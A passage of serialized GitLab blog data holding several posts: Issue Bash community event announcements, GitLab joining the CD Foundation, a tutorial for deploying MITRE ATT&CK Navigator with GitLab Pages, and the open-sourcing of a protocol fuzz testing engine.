2017","en-us/blog/gitlab-issue-bash-december-2017.yml","en-us/blog/gitlab-issue-bash-december-2017",{"_path":2458,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2459,"content":2464,"config":2469,"_id":2471,"_type":14,"title":2472,"_source":16,"_file":2473,"_stem":2474,"_extension":19},"/en-us/blog/gitlab-issue-bash-june-2018",{"title":2460,"description":2461,"ogTitle":2460,"ogDescription":2461,"noIndex":6,"ogImage":2442,"ogUrl":2462,"ogSiteName":673,"ogType":674,"canonicalUrls":2462,"schema":2463},"Join GitLab's June Issue Bash","Join us thin June and help us squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-june-2018","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's June Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2018-05-09\",\n      }",{"title":2460,"description":2461,"authors":2465,"heroImage":2442,"date":2466,"body":2467,"category":299,"tags":2468},[2447],"2018-05-09","\n\nThis June we'll be holding another of our quarterly issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1,900\n[GitLab contributors](http://contributors.gitlab.com/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nCheck out [the Issue Bash landing page](/community/issue-bash/) for all the information about how it works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **June 2nd**\nand will keep it up until 23:59 UTC on Sunday, **June 3rd**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nAs prizes, we have some awesome swag available:\n\n- 14 T-shirts\n- 1 T-shirt and Hoodie for a lucky contributor\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator).\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue.\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n",[277,803,267,9],{"slug":2470,"featured":6,"template":689},"gitlab-issue-bash-june-2018","content:en-us:blog:gitlab-issue-bash-june-2018.yml","Gitlab Issue Bash June 2018","en-us/blog/gitlab-issue-bash-june-2018.yml","en-us/blog/gitlab-issue-bash-june-2018",{"_path":2476,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2477,"content":2482,"config":2487,"_id":2489,"_type":14,"title":2490,"_source":16,"_file":2491,"_stem":2492,"_extension":19},"/en-us/blog/gitlab-issue-bash-march-2018",{"title":2478,"description":2479,"ogTitle":2478,"ogDescription":2479,"noIndex":6,"ogImage":2442,"ogUrl":2480,"ogSiteName":673,"ogType":674,"canonicalUrls":2480,"schema":2481},"Join GitLab's March 2018 Issue Bash","Help us to squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-march-2018","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's March 2018 Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2018-02-15\",\n      }",{"title":2478,"description":2479,"authors":2483,"heroImage":2442,"date":2484,"body":2485,"category":299,"tags":2486},[2447],"2018-02-15","\n\nThis March we'll be holding another of our quarterly issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1,900\n[GitLab contributors](http://contributors.gitlab.com/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **March 3rd**\nand will keep it up until 23:59 UTC on Sunday, **March 4th**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nAs prizes, we have some awesome swag available:\n\n- 14 T-shirts\n- 1 T-shirt and Hoodie for a lucky contributor\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n",[267,277,9],{"slug":2488,"featured":6,"template":689},"gitlab-issue-bash-march-2018","content:en-us:blog:gitlab-issue-bash-march-2018.yml","Gitlab Issue Bash March 2018","en-us/blog/gitlab-issue-bash-march-2018.yml","en-us/blog/gitlab-issue-bash-march-2018",{"_path":2494,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2495,"content":2500,"config":2505,"_id":2507,"_type":14,"title":2508,"_source":16,"_file":2509,"_stem":2510,"_extension":19},"/en-us/blog/gitlab-issue-bash-september-2017",{"title":2496,"description":2497,"ogTitle":2496,"ogDescription":2497,"noIndex":6,"ogImage":2442,"ogUrl":2498,"ogSiteName":673,"ogType":674,"canonicalUrls":2498,"schema":2499},"Join GitLab's September Issue Bash","Join us September 2017 and help us to squash some of the open issues in the GitLab Community Edition tracker!","https://about.gitlab.com/blog/gitlab-issue-bash-september-2017","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's September Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2017-08-08\",\n      }",{"title":2496,"description":2497,"authors":2501,"heroImage":2442,"date":2502,"body":2503,"category":299,"tags":2504},[2447],"2017-08-08","\n\nThis September we'll be holding another of our quarterly issue bashes to allow the Community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1500\n[GitLab contributors](http://contributors.gitlab.com/contributors/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it Going to Happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **September 2nd**\nand will keep it up until 23:59 UTC on Sunday, **September 3rd**.\n\n## Who Can Contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do You Get Involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nWe have some awesome swag ready for you:\n\n- Five T-shirts\n- Four pairs of pajama pants\n- Three Moleskine notebooks\n- Two [PocketCHIPs](https://getchip.com/pages/pocketchip)\n- One messenger bag (filled with all the stuff listed above!)\n\n![GitLab Issue Bash - Prizes](https://about.gitlab.com/images/blogimages/gitlab-issue-bash-june-2017-prizes.png)\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@blackst0ne](https://gitlab.com/blackst0ne)\n",[277,267,9],{"slug":2506,"featured":6,"template":689},"gitlab-issue-bash-september-2017","content:en-us:blog:gitlab-issue-bash-september-2017.yml","Gitlab Issue Bash September 2017","en-us/blog/gitlab-issue-bash-september-2017.yml","en-us/blog/gitlab-issue-bash-september-2017",{"_path":2512,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2513,"content":2519,"config":2525,"_id":2527,"_type":14,"title":2528,"_source":16,"_file":2529,"_stem":2530,"_extension":19},"/en-us/blog/gitlab-joins-cd-foundation",{"title":2514,"description":2515,"ogTitle":2514,"ogDescription":2515,"noIndex":6,"ogImage":2516,"ogUrl":2517,"ogSiteName":673,"ogType":674,"canonicalUrls":2517,"schema":2518},"GitLab leads the industry forward with the CD Foundation","Today we're proud to announce we've joined the CD Foundation as a founding member.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663648/Blog/Hero%20Images/gitlab-joins-cd-foundation.jpg","https://about.gitlab.com/blog/gitlab-joins-cd-foundation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab leads the industry forward with the CD Foundation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2019-03-12\",\n      }",{"title":2514,"description":2515,"authors":2520,"heroImage":2516,"date":2521,"body":2522,"category":299,"tags":2523},[1235],"2019-03-12","\n\nToday GitLab joined the [CD Foundation](https://cd.foundation/announcement/2019/03/12/the-linux-foundation-announces-new-foundation-to-support-continuous-delivery-collaboration/) as a founding member, to help foster collaboration and educate the industry on how to enable any software development team around the world to implement CI/CD best practices.\n\nAs one of the first to introduce cloud native CI/CD to the industry, we are excited to see so many companies come together to discuss ways to take the industry forward to ensure that code is able to get to production not only quickly, but securely. We are looking forward to lending our experience working with millions of developers and thousands of enterprises to drive forward the conversation on best practices and standards to streamline the code delivery promise.\n\n## But there is more to software delivery than CI/CD\n\nWhile it is great there is an eye on the best CI/CD practices, we believe there is more to delivering great software to market than just CI/CD, which is why at GitLab we are focused on providing a single application for the entire DevOps lifecycle.\n\nIt is not only about source code management or CI/CD but also about:\n- [Value stream management](/solutions/value-stream-management/): Understanding your teams' work and their workflow so they can deliver value to customers faster.\n- Operational excellence: Implementing dynamic infrastructure and robust observability to increase uptime and decrease mean time to resolution.\n- Security flow: Building security into every step of your code delivery process, to deliver secure software without slowing the pace of innovation.\n- Monitoring: Automatically monitor metrics so you know how any change in code impacts your production environment.\n\nOur entire [2019 product vision and beyond](/blog/gitlab-product-vision/) is about continuing to build out new capabilities across the entire DevOps lifecycle, to make it easier for enterprises to streamline their processes into one application, helping teams innovate at faster speeds.\n\nAs an open source company, we value the community’s contributions, in helping make GitLab what it is today. We look forward to continuing to drive the industry forward in CI/CD, as well as working with you to help deliver your products to market quickly and securely.\n\nPhoto by [YIFEI CHEN](https://unsplash.com/photos/FPMRxKd7MxI?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/spiral-lights?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[845,2524,9],"CD",{"slug":2526,"featured":6,"template":689},"gitlab-joins-cd-foundation","content:en-us:blog:gitlab-joins-cd-foundation.yml","Gitlab Joins Cd Foundation","en-us/blog/gitlab-joins-cd-foundation.yml","en-us/blog/gitlab-joins-cd-foundation",{"_path":2532,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2533,"content":2539,"config":2545,"_id":2547,"_type":14,"title":2548,"_source":16,"_file":2549,"_stem":2550,"_extension":19},"/en-us/blog/gitlab-mitre-attack-navigator",{"title":2534,"description":2535,"ogTitle":2534,"ogDescription":2535,"noIndex":6,"ogImage":2536,"ogUrl":2537,"ogSiteName":673,"ogType":674,"canonicalUrls":2537,"schema":2538},"Use GitLab and MITRE ATT&CK Navigator to visualize adversary techniques","This tutorial helps build and deploy a customized version of MITRE's ATT&CK Navigator using GitLab CI/CD and GitLab Pages.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","https://about.gitlab.com/blog/gitlab-mitre-attack-navigator","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Use GitLab and MITRE ATT&CK Navigator to visualize adversary techniques\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2023-08-09\",\n      }",{"title":2534,"description":2535,"authors":2540,"heroImage":2536,"date":2542,"body":2543,"category":865,"tags":2544},[2541],"Chris Moberly","2023-08-09","\nIf you use [MITRE ATT&CK](https://attack.mitre.org/) for classifying cybersecurity incidents, you may want to visualize your coverage across a matrix. This blog will show you how to do this automatically with GitLab by deploying the [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator) web application pre-populated with your own annotated matrices.\n\nWe make this easy by providing a fully working [example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator) for you to fork and customize. When you're finished, you'll have an interactive visualization tool that displays your coverage of techniques across the ATT&CK framework.\n\n![Image showing ATT&CK Navigator deployed from example project](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/navigator-portal.png)\nATT&CK Navigator deployed from our example project\n{: .note.text-center}\n\n## About MITRE ATT&CK framework\nMITRE ATT&CK is a framework to classify and describe cybersecurity attacks based on real-world observations. It provides a common language that can be used by different groups inside a security organization to collaborate on security initiatives.\n\nFor example, when a company's Red Team emulates an attack based on the techniques of a relevant adversary, they deliver a report that includes a list of the specific technique IDs involved in the exercise. The team in charge of detecting and responding to these attacks can use those IDs to research and implement improved defensive capabilities.\n\nBoth of these groups may want to track their coverage of offensive and defensive capabilities across one of [MITRE's ATT&CK matrices](https://attack.mitre.org/matrices/enterprise/). These matrices are charts that visualize attack tactics and techniques relevant to specific industries and technologies. For example, a company like GitLab may be interested in understanding which techniques in the [Cloud matrix](https://attack.mitre.org/matrices/enterprise/cloud/) we have emulated to test our detection and response capabilities.\n\nMITRE provides a free interactive web application, ATT&CK Navigator, to visualize, annotate, and explore these matrices.\n\nAt GitLab, [our Red Team](https://about.gitlab.com/handbook/security/threat-management/red-team/) produces a new Navigator matrix at the completion of each operation. The matrix highlights which attack techniques we've conducted. We find it useful to view all of these matrices in a single location, with the addition of a combined matrix showing all of the techniques we have conducted across all historical operations. This helps us understand trends and identify potential gaps to cover in future operations.\n\n## Fork our example project to get started\nYou can fork our example project to get going on your own. First, you will need an account on [GitLab.com](https://gitlab.com), or on a self-hosted instance [with GitLab Pages enabled](https://docs.gitlab.com/ee/administration/pages/).\n\nNext, browse to [our example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator) and click on the \"Forks\" button to create a new fork. Fill in the form shown below by choosing a name, location, and description for your copy of the project. You may wish to change \"Visibility level\" to \"Private,\" which will require authentication to view your deployed application.\n\n![Example project showing where to click on the Forks button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/fork-project.png)\n\nAfter that, take a look inside the `layers/` folder of your new project. Each file in this folder will be used to pre-populate a new tab in the deployed web application where the listed attack techniques are annotated in green. We provide two example files, as well as an empty template file inside `templates/template.yml`.\n\nTemplates should list specific MITRE ATT&CK \"technique\" IDs as bullets below their corresponding MITRE ATT&CK tactic. You only need to include the tactics for which you will add techniques. Here is a short example of techniques across four tactics:\n\n```yaml\nname: Operation 1\ndescription: Example of a Red Team operation - not real data\ntechniques:\n  initial-access:\n    - T1190\n  privilege-escalation:\n    - T1611\n    - T1055\n  lateral-movement:\n    - T1210\n    - T1021\n  exfiltration:\n    - T1041\n```\n\nYou can edit the example files or delete them and add new files of your own.\n\nThe next step is to build and deploy the web application. If you made any changes to the `layers/` folder inside your default branch, this build process should have started automatically. If you just want to deploy the application using the provided sample data, browse to \"Build\" -\\> \"Pipelines\" using the project's sidebar and click the \"Run pipeline\" button.\n\n![Image showing how to build and deploy app with run pipeline button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/run-pipeline.png)\n\n\nYou can check to see if a pipeline has completed successfully by browsing to \"Build\" -\\> \"Jobs\" in the sidebar. There should be at least two jobs with a status of \"passed\" - one named `build_navigator` and one named `pages`.\n\nOnce both jobs are complete, browse to \"Deploy\" -\\> \"Pages\" in the project's sidebar. Check the \"Use unique domain\" box and click the \"Save changes\" button.\n\n![Image showing complete jobs with save changes button](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/pages-settings.png)\n\n\nThat's it! Your application should now be accessible using the URL provided under \"Access pages\" on the same page.\n\n## How the example project works\nThere are three main components inside the example project:\n- The `gitlab-ci.yml` file. This defines what jobs run, and when they run. The file contains rules to automatically run the jobs whenever you push changes to the `layers/` folder inside the project's default branch, or whenever you manually run a pipeline as described above.\n- The `create-layers.py` file. This Python script takes the custom YAML files you provide, and then generates individual and combined JSON files in the format that ATT&CK Navigator expects. You can customize this file to change the annotation color (`HIGHLIGHT_COLOR`) as well as some of the application defaults (`JSON_BLOB`). In our internal version, for example, we remove some of the platform filters that don't apply to us.\n- The `build-navigator.sh` file. The shell script is responsible for downloading the ATT&CK Navigator application, injecting the custom layers we create, and building the application. The output is a static website that we then host using GitLab Pages.\n\n## More features of the ATT&CK Navigator app\nOnce deployed, the application is interactive. This blog focuses on using a colored annotation to visualize coverage, but the [application is capable of much more](https://github.com/mitre-attack/attack-navigator/blob/master/USAGE.md).\n\nHere are some features we use often:\n- In the \"layer controls\" bar up top, click on the button that looks like an asterisk surrounded by up and down arrows. The name is \"expand annotated sub-techniques.\" This will ensure that all techniques in your YAML file are easily viewable, as subtechniques may be hidden away when the matrix first loads.\n- If you want to hide all unannotated techniques, click anywhere in the matrix and select \"select unannotated.\" Then, under \"technique controls,\" click on the \"toggle state\" button. This will give you a much cleaner matrix, showing only the specific techniques you've provided in your custom YAML files.\n\n![ATT&CK Navigator with unannotated techniques hidden](https://about.gitlab.com/images/blogimages/2023-08-15-gitlab-mitre-attack-navigator/navigator-collapsed.png)\nATT&CK Navigator with unannotated techniques hidden\n{: .note.text-center}\n\nATT&CK is not a bingo card, and for most organizations the goal shouldn't be to have green squares across the board. Instead, you should use this to understand your own coverage and how it relates to the threats most relevant to you.\n\n## Share your feedback\nMITRE ATT&CK Navigator is a great tool for visualizing coverage of attack techniques across a matrix. Using our example project, you can easily deploy an automated solution that builds this tool and pre-populates it with your own data.\n\nOn our Red Team, we love to find creative use cases for GitLab, and this is one we use ourselves. If you find this useful, or if you have any ideas to improve it, we would love to hear from you! Feel free to open an issue or a merge request inside our [example project](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-hosted-attack-navigator).\n",[865,9,752,109],{"slug":2546,"featured":6,"template":689},"gitlab-mitre-attack-navigator","content:en-us:blog:gitlab-mitre-attack-navigator.yml","Gitlab Mitre Attack Navigator","en-us/blog/gitlab-mitre-attack-navigator.yml","en-us/blog/gitlab-mitre-attack-navigator",{"_path":2552,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2553,"content":2559,"config":2564,"_id":2566,"_type":14,"title":2567,"_source":16,"_file":2568,"_stem":2569,"_extension":19},"/en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine",{"title":2554,"description":2555,"ogTitle":2554,"ogDescription":2555,"noIndex":6,"ogImage":2556,"ogUrl":2557,"ogSiteName":673,"ogType":674,"canonicalUrls":2557,"schema":2558},"We're open sourcing Protocol Fuzzer Community Edition!","GitLab is releasing an open source protocol fuzz testing repository.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667243/Blog/Hero%20Images/open-source-community.png","https://about.gitlab.com/blog/gitlab-open-sources-protocol-fuzz-test-engine","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're open sourcing Protocol Fuzzer Community Edition!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sam Kerr\"}],\n        \"datePublished\": \"2021-03-23\",\n      }",{"title":2554,"description":2555,"authors":2560,"heroImage":2556,"date":2561,"body":2562,"category":930,"tags":2563},[2013],"2021-03-23","\n\n[GitLab acquired Peach Tech](/press/releases/2020-06-11-gitlab-acquires-peach-tech-and-fuzzit-to-expand-devsecops-offering.html), the industry leader in protocol and API fuzz testing, last year.\n\nWe were thrilled to release [API fuzz testing](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/) as part of our [13.4 release](/releases/2020/09/22/gitlab-13-4-released/#api-fuzz-testing-with-openapi-specs-or-har-files).\nSince then we’ve made tons of improvements, such as [adding Postman support](https://about.gitlab.com/releases/2020/11/22/gitlab-13-6-released/#postman-collection-support-for-api-fuzz-testing)\nand [supporting runtime value overrides](https://gitlab.com/gitlab-org/gitlab/-/issues/273111), and we've received great feedback.\nWe’ve also heard the questions about the Peach protocol fuzz testing\ncapabilities and what is going to happen to them.\n\nToday, we are incredibly excited to announce that we are releasing the core\nprotocol fuzz testing engine of Peach as [GitLab Protocol Fuzzer Community Edition](https://gitlab.com/gitlab-org/security-products/protocol-fuzzer-ce), and it's open source! This edition has many\ncapabilities previously only available with a commercial Peach license.\nIt contains the engine to run and orchestrate fuzz tests as well as the\npieces needed to define your own protocols.\n\n## This is a major gain for the open source community\n\nPreviously, the only way\nto get access to many of these tools was to pay for the commercial\nversion of Peach Fuzzer, or to use an older, unmaintained version of Peach Fuzzer\nCommunity that lacked many of the features and bug fixes available in the commercial version.\nBy open sourcing much of what\nwas previously available only with a paid license, we are thrilled to\nenable more security researchers, students, and developers to experiment\nwith and use protocol fuzz testing to find vulnerabilities and bugs\nthat other tools will not. This also enables everyone to contribute and\nhelp advance the state of the art even further!\n\n## What is fuzz testing?\n\nFuzz testing is an automated software testing technique that provides invalid, unexpected, or random data to a computer program. Like black box testing, a fuzzing tool injects these unexpected inputs into the system and monitors for negative reactions such as crashes or information leakage, which could indicate security, performance, or quality gaps or issues.\nThe goal is to reveal software defects and vulnerabilities. \n\nThe name “fuzzing” dates back to 1988 when the University of Wisconsin - Madison Professor Barton Miller noticed significant interference on the signal while logging into a UNIX system via a dial-up network during a storm. The interference ultimately resulted in a crash.\n\nLater, Miller decided to have his students conduct a simulation of his experience with the idea that external “noise” couldn’t be tolerated by code. They blasted UNIX, Mac, and Windows systems with noise using a fuzz generator to see if they would crash.\n\n## What is a peach fuzzer?\n\nPeach is a SmartFuzzer that provides a way to define the format of data that should be generated as well as how and when the fuzzed data should be generated.\nIt requires the creation of Peach Pit files, which are XML files that contain complete information about the data structure, type of information, and the relationship of the data. The files define the structure, type of information, and relationships in the data to be fuzzed.\nAdditionally, it allows for the configuration of a fuzzing run, including selecting a data transport ([Publisher](https://peachtech.gitlab.io/peach-fuzzer-community/v3/Publisher.html)), logging interface, etc.\nPeach has been under development since 2004.\n\n### What a peach fuzzer does\n\nA peach fuzzer is capable of performing both [generation and mutation-based](https://peachtech.gitlab.io/peach-fuzzer-community/GenerationMutationFuzzing.html) fuzzing.\n\n### Benefits of a peach fuzzer\n\nA peach fuzzer tool is easy to use and allows for efficient testing and standardized reporting suitable for all stakeholders. Tests are repeatable, and findings can be verified and validated across multiple testing sessions.\n\n## Benefits and challenges of fuzz testing\n\nBecause of its random nature, experts believe fuzz testing is most likely to find bugs that other conventional tests and manual audits miss. Some of its other many benefits include:\n \n- Providing a good overall picture of the quality of the target system and software. Fuzzing tools let you easily assess the robustness and security risk posture of the system and software being tested.\n- Fuzzing is the main technique malicious hackers use to find software vulnerabilities. When used in a security program, it helps prevent zero-day exploits from unknown bugs and weaknesses in your system.\n- Reduced cost and time. Once a fuzzer is up and running, it can start to look for bugs on its own, with no manual intervention, and can continue to do so for as long as needed.\n\nSetup and data analysis are the two main challenges practitioners face when trying to implement fuzz testing. It also isn’t easy to set up fuzz testing--it requires complex testing “harnesses” that can be even more tricky to create if the fuzz testing isn’t actually located within an existing toolchain.\n\nFurther, fuzz testing can generate a lot of data, including potentially false positives. So it’s critical that a testing team is prepared to deal with the onslaught of information.\n\nThere is also a perception issue. Because it is less easy to document, negative attitudes toward the “vague” nature of fuzz testing persist in the QA community.\n\n## How to get started with fuzz testing\n\nFuzzing, like another aspect of a software project, requires planning, maintenance, and commitment.\nFirst, figure out what you want to fuzz, what you want to find, and how you are going to fuzz. Then you will want to make sure the tool you’re going to use is flexible enough to cover all uses.\n\nIf you are setting up a fuzzing system but aren’t one of the developers who will actually fix the results found, communicating with the people will be. Ask about the kind of information they want to receive in a bug report from fuzz testing.\n\nAt the very least, a bug report should contain all the information required to reproduce the issue. This may include test case, configuration, operating system used, version or build number of the target, CPU and memory information, and, where applicable, compiler options and debug flags.\n \nIf no new bugs are found after running the fuzz test for a long period of time, this might indicate your fuzzing is either doing a great job, and the robustness of your target is increasing—or that the fuzz is stuck.\n\n## Some fuzz testing best practices\n\nTo ensure the efficiency of your fuzz software and security testing, make sure to follow these best practices:  \n\n- Determine what the target software is to be developed\n- Identify the inputs for the data to be tested\n- Generate your fuzz data  \n- Use the generated fuzz data to execute the test   \n- Monitor the system for potential security vulnerabilities, crashes, and memory leaks  \n- Check defects in the log so they can be addressed before the product is released\n\n## How to use fuzz testing in GitLab\n\nGitlab recommends doing fuzz testing in addition to the other security scanners in [GitLab Secure](https://docs.gitlab.com/ee/user/application_security/index.html) and your own test processes. If you’re using [GitLab CI/CD](https://docs.gitlab.com/ee/ci/index.html), you can run your coverage-guided fuzz testing as part of your CI/CD workflow.\nWeb API fuzzing runs in the fuzz stage of the CI/CD pipeline. To ensure API fuzzing scans the latest code, your CI/CD pipeline should deploy changes to a test environment in one of the stages preceding the fuzz stage.\n\nThe following changes have been made to the API fuzzing template:\n\n- In GitLab 14.0 and later, you must define a fuzz stage in your .gitlab-ci.yml file.\n- In GitLab 13.12 and earlier, the API fuzzing template defines the build, test, deploy, and fuzz stages. The fuzz stage runs last by default. The predefined stages were deprecated and removed from the API-Fuzzing.latest.gitlab-ci.yml template. They will be removed in a future GitLab version.\n\nIf your pipeline is configured to deploy to the same web server on each run, running a pipeline while another is still running could cause a race condition in which one pipeline overwrites the code from another. The API to scan should be excluded from changes for the duration of a fuzzing scan.\n \nThe only changes to the API should be from the fuzzing scanner. Any changes made to the API (for example, by users, scheduled tasks, database changes, code changes, other pipelines, or other scanners) during a scan could cause inaccurate results.\n\nYou can run a [Web API fuzzing scan](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/) using the following methods:\n\n- OpenAPI Specification - versions 2 and 3.\n- GraphQL Schema\n- HTTP Archive (HAR)\n- Postman Collection - versions 2.0 or 2.1\n\nExample projects using these methods are available:\n\n- Example OpenAPI v2 Specification project\n- Example HTTP Archive (HAR) project\n- Example Postman Collection project\n- Example GraphQL project\n- Example SOAP project\n\nMore information about web API fuzz testing in GitLab can be found [here](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/).\n\n## Future plans for fuzz testing\n\nWe plan to add additional capabilities to the Community Edition in the future\nand integrate it into GitLab the product. You can read more details about our\nfuture plans on our [fuzz testing direction page](/direction/secure/dynamic-analysis/fuzz-testing/).\nWe will keep our [stewardship policy](/company/stewardship/) in mind as we [determine which tiers of GitLab that specific features\nare 